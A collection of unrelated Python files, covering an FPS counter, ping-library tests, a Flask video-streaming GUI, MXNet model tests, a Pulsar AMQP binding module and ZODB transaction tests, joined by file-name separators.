py_typecheck.check_type(source.type_signature, computation_types.StructType)
if index is not None:
py_typecheck.check_type(index, int)
py_typecheck.check_none(name)
result_type = source.type_signature[index]
else:
py_typecheck.check_type(name, str)
result_type = getattr(source.type_signature, name)
request = executor_pb2.CreateSelectionRequest(
source_ref=source.value_ref, name=name, index=index)
if self._bidi_stream is None:
response = _request(self._stub.CreateSelection, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_selection=request)
)).create_selection
py_typecheck.check_type(response, executor_pb2.CreateSelectionResponse)
return RemoteValue(response.value_ref, result_type, self)
@tracing.trace(span=True)
async def _compute(self, value_ref):
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
request = executor_pb2.ComputeRequest(value_ref=value_ref)
if self._bidi_stream is None:
response = _request(self._stub.Compute, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(compute=request))).compute
py_typecheck.check_type(response, executor_pb2.ComputeResponse)
value, _ = executor_service_utils.deserialize_value(response.value)
return value
|
mpfps.py
|
import multiprocessing
import logging
import time
import sys
import numpy as np
import threading
from lib.mpvariable import MPVariable
import types
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY2:
import copy_reg
elif PY3:
import copyreg as copy_reg
def _pickle_method(m):
if m.im_self is None:
return getattr, (m.im_class, m.im_func.func_name)
else:
return getattr, (m.im_self, m.im_func.func_name)
copy_reg.pickle(types.MethodType, _pickle_method)
class FPS():
def __init__(self, cfg):
self.cfg = cfg
return
def start_counter(self):
"""
Start via Process
"""
m = multiprocessing.Process(target=self.process_fps_counter, args=())
m.start()
return m
def start_console(self):
"""
Start via Process
"""
m = multiprocessing.Process(target=self.process_fps_console, args=())
m.start()
return m
def process_fps_counter(self):
"""
frame_counter.value: Frame counter value shared by processes.
update fps by 0.2 sec
"""
logging.debug("enter")
FPS_INTERVAL = self.cfg['fps_interval']
DEBUG_MODE = self.cfg['debug_mode']
MAX_VIS_FPS = self.cfg['max_vis_fps']
sleep_interval = 1.0 / 50.0 # Wakeup and time checks N times per sec.
snapshot_interval = 1.0 / 5.0 # FPS calculate N times per sec. (must snapshot_interval >= sleep_interval)
fps_stream_length = FPS_INTERVAL # FPS stream seconds length. FPS is the frames per second processed during the most recent this time.
fps_stream = [] # Array of fps_snapshot during fps_stream_length
snapshot = None # One array (frames_in_interval, interval_seconds, unixtime) per snapshot_interval
vis_fps_stream = []
vis_snapshot = None
if DEBUG_MODE:
""" FOR PERFORMANCE DEBUG """
snapshot_fps = 0
min_snapshot_fps = 10000
max_snapshot_fps = 0
min_snapshot_list = []
max_snapshot_list = []
""" """
try:
launch_time = time.time()
while MPVariable.running.value and MPVariable.frame_counter.value == 0:
time.sleep(sleep_interval)
MPVariable.first_complete_time.value = time.time() - launch_time
print("Time to first image:{}".format(MPVariable.first_complete_time.value))
previos_work_time = time.time()
while MPVariable.running.value:
time.sleep(sleep_interval)
now_time = time.time()
if now_time >= previos_work_time + snapshot_interval:
### FPS update by snapshot_interval ###
snapshot_frames = MPVariable.frame_counter.value
MPVariable.frame_counter.value = 0
vis_snapshot_frames = MPVariable.vis_frame_counter.value
MPVariable.vis_frame_counter.value = 0
"""
FPS stream
"""
snapshot_seconds = now_time - previos_work_time
snapshot = (snapshot_frames, snapshot_seconds, now_time)
fps_stream += [snapshot]
vis_snapshot = (vis_snapshot_frames, snapshot_seconds, now_time)
vis_fps_stream += [vis_snapshot]
if DEBUG_MODE:
"""
FOR PERFORMANCE DEBUG
FPS snapshot calculation
"""
snapshot_fps = snapshot_frames/snapshot_seconds
MPVariable.fps_snapshot.value = snapshot_fps # FPS of snapshot. for visualize
if min_snapshot_fps >= snapshot_fps:
min_snapshot_fps = snapshot_fps
min_snapshot_list += [snapshot_fps]
print("min_snapshot:{:.1f} {}".format(snapshot_fps, snapshot))
if max_snapshot_fps <= snapshot_fps:
max_snapshot_fps = snapshot_fps
max_snapshot_list += [snapshot_fps]
print("max_snapshot:{:.1f} {}".format(snapshot_fps, snapshot))
""" """
"""
PROC FPS
"""
while MPVariable.running.value:
(min_frame, min_seconds, min_time) = fps_stream[0]
if now_time - min_time > fps_stream_length:
"""
drop old snapshot
"""
fps_stream.pop(0)
else:
"""
goto FPS streaming calculation
"""
break
if(len(fps_stream) > 0):
"""
FPS streaming calculation
count frames and seconds in stream
"""
np_fps_stream = np.array(fps_stream)
np_fps_stream = np_fps_stream[:,:2] # take frames, seconds. drop unixtime.
np_fps = np.sum(np_fps_stream, axis=0) # [total_frames, total_seconds] duaring fps_stream_length
"""
insert local values to shared variables
"""
MPVariable.fps_frames.value = int(np_fps[0]) # for console output
MPVariable.fps_seconds.value = np_fps[1] # for console output
MPVariable.fps.value = np_fps[0]/np_fps[1] # for visualize and console
else:
MPVariable.fps_frames.value = 0
MPVariable.fps_seconds.value = -1 # for toooooooo slow fps check. if -1 sec appears, fps_stream_length should set more long time.
MPVariable.fps.value = 0
"""
VIS FPS
"""
while MPVariable.running.value:
(min_frame, min_seconds, min_time) = vis_fps_stream[0]
if now_time - min_time > fps_stream_length:
"""
drop old snapshot
"""
vis_fps_stream.pop(0)
else:
"""
goto FPS streaming calculation
"""
break
if(len(vis_fps_stream) > 0):
"""
FPS streaming calculation
count frames and seconds in stream
"""
np_fps_stream = np.array(vis_fps_stream)
np_fps_stream = np_fps_stream[:,:2] # take frames, seconds. drop unixtime.
np_fps = np.sum(np_fps_stream, axis=0) # [total_frames, total_seconds] duaring fps_stream_length
"""
insert local values to shared variables
"""
MPVariable.vis_fps_frames.value = int(np_fps[0]) # for console output
MPVariable.vis_fps.value = np_fps[0]/np_fps[1] # for visualize and console
if MAX_VIS_FPS <= 0:
MPVariable.vis_skip_rate.value = 0
else:
rate = MPVariable.fps.value/MAX_VIS_FPS
MPVariable.vis_skip_rate.value = rate
else:
MPVariable.vis_fps_frames.value = 0
MPVariable.vis_fps.value = 0
MPVariable.vis_skip_rate.value = 0
previos_work_time = now_time
except KeyboardInterrupt:
pass
except Exception as e:
import traceback
traceback.print_exc()
finally:
MPVariable.running.value = False
if DEBUG_MODE:
print("min_snapshot_fps:{:.1f}".format(min_snapshot_fps))
print("{}".format(min_snapshot_list))
print("max_snapshot_fps:{:.1f}".format(max_snapshot_fps))
print("{}".format(max_snapshot_list))
return
def process_fps_console(self):
"""
print fps by fps_interval sec.
"""
logging.debug("enter")
FPS_INTERVAL = self.cfg['fps_interval']
DEBUG_MODE = self.cfg['debug_mode']
SPLIT_MODEL = self.cfg['split_model']
sleep_interval = 1.0 / 50.0 # Wakeup and time checks N times per sec.
try:
while MPVariable.running.value and MPVariable.frame_counter.value == 0:
time.sleep(sleep_interval)
previos_work_time = time.time()
while MPVariable.running.value:
time.sleep(sleep_interval)
now_time = time.time()
if now_time >= previos_work_time + FPS_INTERVAL:
"""
FPS console by fps_interval
"""
frames = MPVariable.fps_frames.value
seconds = MPVariable.fps_seconds.value
if frames == 0:
total = 0
cap = 0
worker = 0
gpu = 0
cpu = 0
lost = 0
else:
total = MPVariable.total_proc_time.value/frames
cap = MPVariable.cap_proc_time.value/frames
worker = MPVariable.gpu_proc_time.value/frames
gpu = MPVariable.gpu_proc_time.value/frames
cpu = MPVariable.cpu_proc_time.value/frames
lost = MPVariable.lost_proc_time.value/frames
print("FPS:{: ^5.1f} Frames:{: ^3} Seconds:{: ^10.5f} | 1FRAME total:{: ^10.5f} cap:{: ^10.5f} worker:{: ^10.5f} gpu:{: ^10.5f} cpu:{: ^10.5f} lost:{: ^10.5f} send:{: ^10.5f} | VFPS:{: ^5.1f} VFrames:{: ^3} VDrops:{: ^3}"
.format(MPVariable.fps.value, MPVariable.fps_frames.value, MPVariable.fps_seconds.value,
total,
cap,
worker,
gpu,
cpu,
lost,
MPVariable.send_proc_time.value,
MPVariable.vis_fps.value, MPVariable.vis_fps_frames.value, MPVariable.vis_drop_frames.value))
MPVariable.cap_proc_time.value = 0
MPVariable.worker_proc_time.value = 0
MPVariable.gpu_proc_time.value = 0
MPVariable.cpu_proc_time.value = 0
MPVariable.lost_proc_time.value = 0
MPVariable.total_proc_time.value = 0
MPVariable.vis_proc_time.value = 0
MPVariable.vis_drop_frames.value = 0
previos_work_time = now_time
except KeyboardInterrupt:
pass
except Exception as e:
import traceback
traceback.print_exc()
finally:
MPVariable.running.value = False
print("Time to first image:{}".format(MPVariable.first_complete_time.value))
return
|
test___init__.py
|
'''cping.protocols tests'''
import threading
import time
import unittest
import cping.protocols
# pylint: disable=protected-access
class TestHost(unittest.TestCase):
'''cping.protocols.Host tests.'''
def test_add_result(self):
'''Add a result.'''
host = cping.protocols.Ping()('localhost')
host.add_result(1)
host.add_result(2, True)
self.assertEqual(host.results[0], {'latency': 1, 'error': False})
self.assertEqual(host.results[1], {'latency': 2, 'error': True})
def test_add_result_invalid_type_latency(self):
'''Add a result with an invalid latency type.'''
host = cping.protocols.Ping()('localhost')
with self.assertRaisesRegex(TypeError, 'latency must be a float'):
host.add_result('hi')
def test_add_result_invalid_type_error(self):
'''Add a result with an invalid error type.'''
host = cping.protocols.Ping()('localhost')
with self.assertRaisesRegex(TypeError, 'error must be a boolean'):
host.add_result(1, 1)
def test_is_running(self):
'''Confirm that the host correctly detects when the loop is running.'''
host = cping.protocols.Ping()('localhost')
self.assertFalse(host.is_running())
stop = threading.Event()
host._test_thread = threading.Thread(target=stop.wait)
self.assertFalse(host.is_running())
host._test_thread.start()
self.assertTrue(host.is_running())
stop.set()
host._test_thread.join()
self.assertFalse(host.is_running())
def test_results_summary(self):
'''Get the statistics on the results.'''
host = cping.protocols.Ping()('localhost')
# All stats are None
for key, value in host.results_summary.items():
self.assertIsNone(value, msg=f'{key} is not None')
host.add_result(0.8)
self.assertEqual(host.results_summary['min'], 800)
self.assertEqual(host.results_summary['avg'], 800)
self.assertEqual(host.results_summary['max'], 800)
self.assertIs(host.results_summary['stdev'], None)
self.assertEqual(host.results_summary['loss'], 0)
host.add_result(0.6)
self.assertEqual(host.results_summary['min'], 600)
self.assertEqual(host.results_summary['avg'], 700)
self.assertEqual(host.results_summary['max'], 800)
self.assertEqual(round(host.results_summary['stdev'], 3), 141.421)
self.assertEqual(host.results_summary['loss'], 0)
host.add_result(-1)
self.assertEqual(host.results_summary['min'], 600)
self.assertEqual(host.results_summary['avg'], 700)
self.assertEqual(host.results_summary['max'], 800)
self.assertEqual(round(host.results_summary['stdev'], 3), 141.421)
self.assertEqual(round(host.results_summary['loss'], 3), 0.333)
def test_set_results_length(self):
'''Change the results length.'''
host = cping.protocols.Ping()('localhost')
for i in range(120):
host.add_result(i)
self.assertEqual(len(host.results),
cping.protocols.RESULTS_LENGTH_MINIMUM)
host.set_results_length(120)
for i in range(120):
host.add_result(i)
self.assertEqual(len(host.results), 120)
def test_set_results_length_invalid_type_new_length(self):
'''set_results_length with wrong new_length.'''
with self.assertRaisesRegex(TypeError, 'new_length must be an int'):
cping.protocols.Ping()('localhost').set_results_length(10.0)
def test_start(self):
'''Start host with a dummy ping_loop.'''
def dummy_ping_loop(host):
time.sleep(0.1)
host.stop_signal.set()
host = cping.protocols.Ping()('localhost')
host.protocol.ping_loop = dummy_ping_loop
host.status = 'Cleared at start'
# Confirm that start clears stop_signal
host.stop_signal.set()
host.start()
self.assertIsNone(host.status)
self.assertTrue(host.is_running())
self.assertFalse(host.stop_signal.is_set())
# Confirm that the stop signal is set
host._test_thread.join()
self.assertTrue(host.stop_signal.is_set())
def test_start_delay(self):
'''Start host with a delay on ping_loop.'''
host = cping.protocols.Ping()('localhost')
host.protocol.ping_loop = lambda host: host.stop_signal.set()
host.start(delay=0.05)
self.assertTrue(host.is_running())
self.assertFalse(host.stop_signal.is_set())
# Confirm that the stop signal is set
host._test_thread.join()
self.assertTrue(host.stop_signal.is_set())
def test_start_invalid_type_delay(self):
'''Start host with a delay of an invalid type.'''
with self.assertRaisesRegex(TypeError, 'delay must be a float'):
cping.protocols.Ping()('localhost').start(delay='hi')
def test_stop(self):
'''Ensure stop sets stop_signal and, if `block=True`, waits until
ping_loop exits.'''
def dummy_ping_loop(host):
host.stop_signal.wait()
time.sleep(0.1)
host = cping.protocols.Ping()('localhost')
host.protocol.ping_loop = dummy_ping_loop
host.start()
self.assertFalse(host.stop_signal.is_set())
self.assertTrue(host._test_thread.is_alive())
host.stop()
self.assertTrue(host.stop_signal.is_set())
self.assertTrue(host._test_thread.is_alive())
host.stop(block=True)
self.assertTrue(host.stop_signal.is_set())
self.assertFalse(host._test_thread.is_alive())
def test_invalid_type_address(self):
'''Create an instance of Host with an invalid host type.'''
with self.assertRaisesRegex(TypeError, 'address must be a string'):
cping.protocols.Host(1, None)
def test_invalid_type_protocol(self):
'''Create an instance of Host with an invalid protocol type.'''
regex = 'protocol must be an instance of cping.protocols.Ping'
with self.assertRaisesRegex(TypeError, regex):
cping.protocols.Host('localhost', None)
def test_invalid_type_status(self):
'''Host's status with invalid type.'''
host = cping.protocols.Ping()('localhost')
self.assertIs(host.status, None)
with self.assertRaisesRegex(TypeError, 'status must be a string'):
host.status = 1
def test_read_only_address(self):
'''Host's address attribute is read only.'''
host = cping.protocols.Ping()('localhost')
self.assertEqual(host.address, 'localhost')
with self.assertRaisesRegex(AttributeError, 'can.t set attribute'):
host.address = 'hi'
def test_read_only_burst_mode(self):
'''Host's burst_mode attribute is read only.'''
host = cping.protocols.Ping()('localhost')
self.assertTrue(isinstance(host.burst_mode, threading.Event))
with self.assertRaisesRegex(AttributeError, 'can.t set attribute'):
host.burst_mode = None
def test_read_only_protocol(self):
'''Host's protocol attribute is read only.'''
ping = cping.protocols.Ping()
host = cping.protocols.Host('localhost', ping)
self.assertIs(host.protocol, ping)
with self.assertRaisesRegex(AttributeError, 'can.t set attribute'):
host.protocol = None
def test_read_only_read_signal(self):
'''Host's ready_signal attribute is read only.'''
host = cping.protocols.Ping()('localhost')
self.assertTrue(isinstance(host.ready_signal, threading.Event))
with self.assertRaisesRegex(AttributeError, 'can.t set attribute'):
host.ready_signal = None
def test_read_only_results(self):
'''Host's results attribute is read only.'''
host = cping.protocols.Ping()('localhost')
# Confirm a copy is returned
self.assertIsNot(host.results, host.results)
with self.assertRaisesRegex(AttributeError, 'can.t set attribute'):
host.results = {}
def test___str__(self):
'''Confim Host's __str__ format.'''
self.assertEqual(str(cping.protocols.Ping()('hello')), 'hello')
class TestPing(unittest.TestCase):
'''cping.protocols.Ping tests.'''
def test_ping_loop(self):
'''Ensure ping_loop raises NotImplementedError.'''
with self.assertRaises(NotImplementedError):
cping.protocols.Ping().ping_loop(None)
def test_wait(self):
'''Timeout should account for the test latency and burst mode.'''
host = cping.protocols.Ping()('host')
# The latency is subtracted from the protocol interval
checkpoint = time.time()
host.protocol.wait(host, 0.5)
self.assertTrue(0.4 <= time.time() - checkpoint <= 0.6)
# No timeout when the ping failed (already spent the full interval)
checkpoint = time.time()
host.protocol.wait(host, -1)
self.assertLess(time.time() - checkpoint, 0.1)
# No timeout when the burst mode is enabled
checkpoint = time.time()
host.burst_mode.set()
host.protocol.wait(host, 0.5)
self.assertLess(time.time() - checkpoint, 0.1)
def test_invalid_type_interval(self):
'''Create an instance of Ping with an invalid interval type.'''
with self.assertRaisesRegex(TypeError, 'interval must be a float'):
cping.protocols.Ping('hi')
|
web_gui.py
|
import threading
import time
import cv2 as cv
import numpy as np
from datetime import date
from flask import Flask
from flask import render_template
from flask import Response
from .utils import visualization_utils as vis_util
from tools.objects_post_process import extract_violating_objects
from tools.environment_score import mx_environment_scoring_consider_crowd
category_index = {0: {
"id": 0,
"name": "Pedestrian",
}} # TODO: json file for detector config
class WebGUI:
"""
The Webgui object implements a flask application and acts as an interface for users.
Once it is created it will act as a central application for viewing outputs.
:param config: Is a ConfigEngine instance which provides necessary parameters.
:param engine_instance: A ConfigEngine object which store all of the config parameters. Access to any parameter
is possible by calling get_section_dict method.
"""
def __init__(self, config, engine_instance):
self.config = config
self.__ENGINE_INSTANCE = engine_instance
self._output_frame = None
self._birds_view = None
self._lock = threading.Lock()
self._host = self.config.get_section_dict("App")["Host"]
self._port = int(self.config.get_section_dict("App")["Port"])
self.app = self.create_flask_app()
self._dist_threshold = float(self.config.get_section_dict("PostProcessor")["DistThreshold"])
self._displayed_items = {} # all items here will be used at ui webpage
# TODO: read from config file
file_name = str(date.today()) + '.csv'
self.objects_log = './static/data/objects_log/' + file_name
def update(self, input_frame, nn_out, distances):
"""
Args:
input_frame: uint8 numpy array with shape (img_height, img_width, 3)
nn_out: List of dicionary contains normalized numbers of bounding boxes
{'id' : '0-0', 'bbox' : [x0, y0, x1, y1], 'score' : 0.99(optional} of shape [N, 3] or [N, 2]
distances: a symmetric matrix of normalized distances
Returns:
draw the bounding boxes to an output frame
"""
# Create a black window for birds' eye view the size of window is constant (300, 200, 3)
birds_eye_window = np.zeros((300, 200, 3), dtype="uint8")
# Get a proper dictionary of bounding boxes and colors for visualizing_boxes_and_labels_on_image_array function
output_dict = vis_util.visualization_preparation(nn_out, distances, self._dist_threshold)
# Draw bounding boxes and other visualization factors on input_frame
vis_util.visualize_boxes_and_labels_on_image_array(
input_frame,
output_dict["detection_boxes"],
output_dict["detection_classes"],
output_dict["detection_scores"],
output_dict["detection_colors"],
category_index,
instance_masks=output_dict.get("detection_masks"),
use_normalized_coordinates=True,
line_thickness=3,
)
# TODO: Implement perspective view for objects
birds_eye_window = vis_util.birds_eye_view(birds_eye_window, output_dict["detection_boxes"],
output_dict["violating_objects"])
try:
self._displayed_items['fps'] = self.__ENGINE_INSTANCE.detector.fps
except:
# fps is not implemented for the detector instance"
self._displayed_items['fps'] = None
# Put fps to the frame
# region
# -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_-
txt_fps = 'Frames rate = ' + str(self._displayed_items['fps']) + '(fps)' # Frames rate = 95 (fps)
# (0, 0) is the top-left (x,y); normalized number between 0-1
origin = (0.05, 0.93)
vis_util.text_putter(input_frame, txt_fps, origin)
# -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_-
# endregion
# Put environment score to the frame
# region
# -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_-
violating_objects = extract_violating_objects(distances, self._dist_threshold)
env_score = mx_environment_scoring_consider_crowd(len(nn_out), len(violating_objects))
txt_env_score = 'Env Score = ' + str(env_score) # Env Score = 0.7
origin = (0.05, 0.98)
vis_util.text_putter(input_frame, txt_env_score, origin)
# -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_-
# endregion
# Lock the main thread and copy input_frame to output_frame
with self._lock:
self._output_frame = input_frame.copy()
self._birds_view = birds_eye_window.copy()
def create_flask_app(self):
# Create and return a flask instance named 'app'
app = Flask(__name__)
@app.route("/")
def _index():
# Render a html file located at templates as home page
return render_template("index.html")
@app.route("/video_feed")
def video_feed():
# Return the response generated along with the specific media
# Type (mime type)
return Response(
self._generate(1), mimetype="multipart/x-mixed-replace; boundary=frame"
)
@app.route("/birds_view_feed")
def birds_view_feed():
# Return the response generated along with the specific media
# Type (mime type)
return Response(
self._generate(2), mimetype="multipart/x-mixed-replace; boundary=frame"
)
@app.route("/visualize_logs", methods=['GET'])
def visualizer_page():
# Render a html file located at templates as home page
path = [self.objects_log]
return render_template("visualizer.html", csv_path=path)
return app
def _generate(self, out_frame: int):
"""
Args:
out_frame: The name of required frame. out_frame = 1 encoded camera/video frame otherwise
encoded birds-eye window
Returns:
Yield and encode output_frame for flask the response object that is used by default in Flask
"""
while True:
with self._lock:
# Check if the output frame is available, otherwise skip
# The iteration of the loop
if self._output_frame is None:
continue
# Encode the frames in JPEG format
(flag, encoded_birds_eye_img) = cv.imencode(".jpeg", self._birds_view)
(flag, encoded_input_img) = cv.imencode(".jpeg", self._output_frame)
# Ensure the frame was successfully encoded
if not flag:
continue
# Yield the output frame in the byte format
encoded_input_frame = (
b"--frame\r\n"
b"Content-Type: image/jpeg\r\n\r\n" + bytearray(encoded_input_img) + b"\r\n")
encoded_birds_eye_frame = (
b"--frame\r\n"
b"Content-Type: image/jpeg\r\n\r\n" + bytearray(encoded_birds_eye_img) + b"\r\n")
yield encoded_input_frame if out_frame == 1 else encoded_birds_eye_frame
def _run(self):
self.app.run(
host=self._host, port=self._port, debug=True, threaded=True, use_reloader=False,
)
def start(self):
"""
Start the thread's activity.
It must be called at most once. It runes self._run method on a separate thread and starts
process_video method at engine instance
"""
threading.Thread(target=self._run).start()
time.sleep(1)
# Get video file path from the config
video_path = self.config.get_section_dict("App")["VideoPath"]
self.__ENGINE_INSTANCE.process_video(video_path)
|
test_gluon_model_zoo.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import mxnet as mx
from mxnet.gluon.model_zoo.vision import get_model
import sys
from common import setup_module, with_seed, teardown_module
import multiprocessing
import pytest
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
@with_seed()
def test_models():
all_models = ['resnet18_v1', 'resnet34_v1', 'resnet50_v1', 'resnet101_v1', 'resnet152_v1',
'resnet18_v2', 'resnet34_v2', 'resnet50_v2', 'resnet101_v2', 'resnet152_v2',
'vgg11', 'vgg13', 'vgg16', 'vgg19',
'vgg11_bn', 'vgg13_bn', 'vgg16_bn', 'vgg19_bn',
'alexnet', 'inceptionv3',
'densenet121', 'densenet161', 'densenet169', 'densenet201',
'squeezenet1.0', 'squeezenet1.1',
'mobilenet1.0', 'mobilenet0.75', 'mobilenet0.5', 'mobilenet0.25',
'mobilenetv2_1.0', 'mobilenetv2_0.75', 'mobilenetv2_0.5', 'mobilenetv2_0.25']
pretrained_to_test = set(['squeezenet1.1'])
for model_name in all_models:
test_pretrain = model_name in pretrained_to_test
model = get_model(model_name, pretrained=test_pretrain, root='model/')
data_shape = (2, 3, 224, 224) if 'inception' not in model_name else (2, 3, 299, 299)
eprint('testing forward for %s' % model_name)
print(model)
if not test_pretrain:
model.collect_params().initialize()
model(mx.nd.random.uniform(shape=data_shape)).wait_to_read()
def parallel_download(model_name):
model = get_model(model_name, pretrained=True, root='./parallel_download')
print(type(model))
@with_seed()
@pytest.mark.skip(reason='MXNet is not yet safe for forking. Tracked in #17782.')
def test_parallel_download():
processes = []
name = 'mobilenetv2_0.25'
for _ in range(10):
p = multiprocessing.Process(target=parallel_download, args=(name,))
processes.append(p)
for p in processes:
p.start()
for p in processes:
p.join()
|
bind_amqp.py
|
from galaxy.util import asbool, mask_password_from_url
from pulsar.client import amqp_exchange_factory
from pulsar import manager_endpoint_util
import functools
import threading
import logging
log = logging.getLogger(__name__)
TYPED_PARAMS = {
"amqp_consumer_timeout": lambda val: None if str(val) == "None" else float(val),
"amqp_publish_retry": asbool,
"amqp_publish_retry_max_retries": int,
"amqp_publish_retry_interval_start": int,
"amqp_publish_retry_interval_step": int,
"amqp_publish_retry_interval_max": int,
}
def get_exchange(connection_string, manager_name, conf):
# HACK: Fixup non-string parameters - utlimately this should reuse spec
# stuff from Galaxy.
for param, to_type in TYPED_PARAMS.iteritems():
if param in conf:
val = conf[param]
conf[param] = to_type(val)
pulsar_exchange = amqp_exchange_factory.get_exchange(
connection_string,
manager_name,
conf
)
return pulsar_exchange
def bind_manager_to_queue(manager, queue_state, connection_string, conf):
pulsar_exchange = get_exchange(connection_string, manager.name, conf)
process_setup_messages = functools.partial(__process_setup_message, manager)
process_kill_messages = functools.partial(__process_kill_message, manager)
def drain(callback, name):
__drain(name, queue_state, pulsar_exchange, callback)
log.info("Finished consuming %s queue - no more messages will be processed." % (name))
if conf.get("message_queue_consume", True):
setup_thread = start_setup_consumer(pulsar_exchange, functools.partial(drain, process_setup_messages, "setup"))
kill_thread = start_kill_consumer(pulsar_exchange, functools.partial(drain, process_kill_messages, "kill"))
if hasattr(queue_state, "threads"):
queue_state.threads.extend([setup_thread, kill_thread])
# TODO: Think through job recovery, jobs shouldn't complete until after bind
# has occurred.
def bind_on_status_change(new_status, job_id):
job_id = job_id or 'unknown'
try:
message = "Publishing Pulsar state change with status %s for job_id %s" % (new_status, job_id)
log.debug(message)
payload = manager_endpoint_util.full_status(manager, new_status, job_id)
pulsar_exchange.publish("status_update", payload)
except:
log.exception("Failure to publish Pulsar state change for job_id %s." % job_id)
raise
if conf.get("message_queue_publish", True):
manager.set_state_change_callback(bind_on_status_change)
def __start_consumer(name, exchange, target):
exchange_url = mask_password_from_url(exchange.url)
thread_name = "consume-%s-%s" % (name, exchange_url)
thread = threading.Thread(name=thread_name, target=target)
thread.daemon = False
thread.start()
return thread
start_setup_consumer = functools.partial(__start_consumer, "setup")
start_kill_consumer = functools.partial(__start_consumer, "kill")
def __drain(name, queue_state, pulsar_exchange, callback):
pulsar_exchange.consume(name, callback=callback, check=queue_state)
def __process_kill_message(manager, body, message):
try:
job_id = __client_job_id_from_body(body)
assert job_id, 'Could not parse job id from body: %s' % body
log.debug("Received message in kill queue for Pulsar job id: %s", job_id)
manager.kill(job_id)
except Exception:
log.exception("Failed to kill job.")
message.ack()
def __process_setup_message(manager, body, message):
try:
job_id = __client_job_id_from_body(body)
assert job_id, 'Could not parse job id from body: %s' % body
log.debug("Received message in setup queue for Pulsar job id: %s", job_id)
manager_endpoint_util.submit_job(manager, body)
except Exception:
job_id = job_id or 'unknown'
log.exception("Failed to setup job %s obtained via message queue." % job_id)
message.ack()
def __client_job_id_from_body(body):
job_id = body.get("job_id", None)
return job_id
|
test_transactions.py
|
import queue
import threading
import pytest
import sheraf.transactions
import tests
import ZODB.POSException
from tests.utils import conflict
def test_initial_value():
_queue = queue.Queue()
def run(q):
q.put(sheraf.Database.current_connection())
thread = threading.Thread(target=run, args=(_queue,))
thread.start()
thread.join()
assert _queue.get(timeout=0.1) is None
class Book(tests.UUIDAutoModel):
name = sheraf.SimpleAttribute()
class BookRenamer(threading.Thread):
def __init__(self, book_id, name):
super().__init__()
self.queue = queue.Queue()
self._book_id = book_id
self._name = name
def run(self):
try:
self.do_things()
except Exception as exc: # pragma: no cover
self.queue.put(exc)
else:
self.queue.put(None)
def do_things(self):
def _rename():
_book = Book.read(self._book_id)
_book.name = self._name
with sheraf.connection():
sheraf.transactions.attempt(_rename, on_failure=None)
def test_threaded_attempt(sheraf_zeo_database):
nb_threads = 3
with sheraf.connection(commit=True):
_book = Book.create()
_threads = [BookRenamer(_book.id, str(i)) for i in range(nb_threads)]
for _thread in _threads:
_thread.start()
for _thread in _threads:
_thread.join()
exc = _thread.queue.get()
if exc: # pragma: no cover
raise exc
with sheraf.connection():
_book = _book.read(_book.id)
assert _book.name in (str(i) for i in range(nb_threads))
def test_attempt(sheraf_database):
with sheraf.connection():
def _create():
_book = Book.create()
_book.name = "livre"
sheraf.transactions.attempt(_create, on_failure=None)
with sheraf.connection():
[_book] = Book.all()
assert "livre" == _book.name
def test_args_attempt(sheraf_database):
with sheraf.connection():
def _create(arg1, arg2, arg3="", arg4=""):
return arg1 + arg2 + arg3 + arg4
result = sheraf.transactions.attempt(
_create,
args=("foo", "bar"),
kwargs={"arg3": "A", "arg4": "B"},
on_failure=None,
)
with sheraf.connection():
assert "foobarAB" == result
def test_attempt_small_conflict(sheraf_database):
conflict.reset()
with sheraf.connection():
def _create():
_book = Book.create()
_book.name = "livre"
conflict(times=sheraf.transactions.ATTEMPTS - 2)
sheraf.transactions.attempt(_create, on_failure=None)
with sheraf.connection():
[_book] = Book.all()
assert "livre" == _book.name
def test_attempt_multiple_conflicts(sheraf_database):
conflict.reset()
with pytest.raises(ZODB.POSException.ConflictError):
with sheraf.connection():
def _create():
_book = Book.create()
_book.name = "livre"
conflict(times=sheraf.transactions.ATTEMPTS)
sheraf.transactions.attempt(_create, on_failure=None)
with sheraf.connection():
assert not list(Book.all())
def test_attempt_exceptions(sheraf_database):
with pytest.raises(IndexError):
with sheraf.connection():
def _create():
_book = Book.create()
_book.name = "livre"
raise IndexError()
sheraf.transactions.attempt(_create, on_failure=None)
with sheraf.connection():
assert not list(Book.all())
def test_commit(sheraf_database):
with sheraf.connection():
@sheraf.transactions.commit
def _create():
_book = Book.create()
_book.name = "livre"
_create()
with sheraf.connection():
[_book] = Book.all()
assert "livre" == _book.name
def test_commit_small_conflict(sheraf_database):
conflict.reset()
with sheraf.connection():
@sheraf.transactions.commit
def _create():
_book = Book.create()
_book.name = "livre"
conflict(times=sheraf.transactions.ATTEMPTS - 2)
_create()
with sheraf.connection():
[_book] = Book.all()
assert "livre" == _book.name
def test_commit_multiple_conflicts(sheraf_database):
conflict.reset()
with pytest.raises(ZODB.POSException.ConflictError):
with sheraf.connection():
@sheraf.transactions.commit
def _create():
_book = Book.create()
_book.name = "livre"
conflict(times=sheraf.transactions.ATTEMPTS)
_create()
with sheraf.connection():
assert not list(Book.all())
def test_commit_exceptions(sheraf_database):
with pytest.raises(IndexError):
with sheraf.connection():
@sheraf.transactions.commit
def _create():
_book = Book.create()
_book.name = "livre"
raise IndexError()
_create()
with sheraf.connection():
assert not list(Book.all())
|
core.py
|
"""
libraries needed
machine: for uart usage
uio: packet buffer
struct: serlization
_TopicInfo: for topic negotiation
already provided in rosserial_msgs
"""
import machine as m
import uio
import ustruct as struct
from time import sleep, sleep_ms, sleep_us
from rosserial_msgs import TopicInfo
import sys
import os
#for now threads are used, will be changed with asyncio in the future
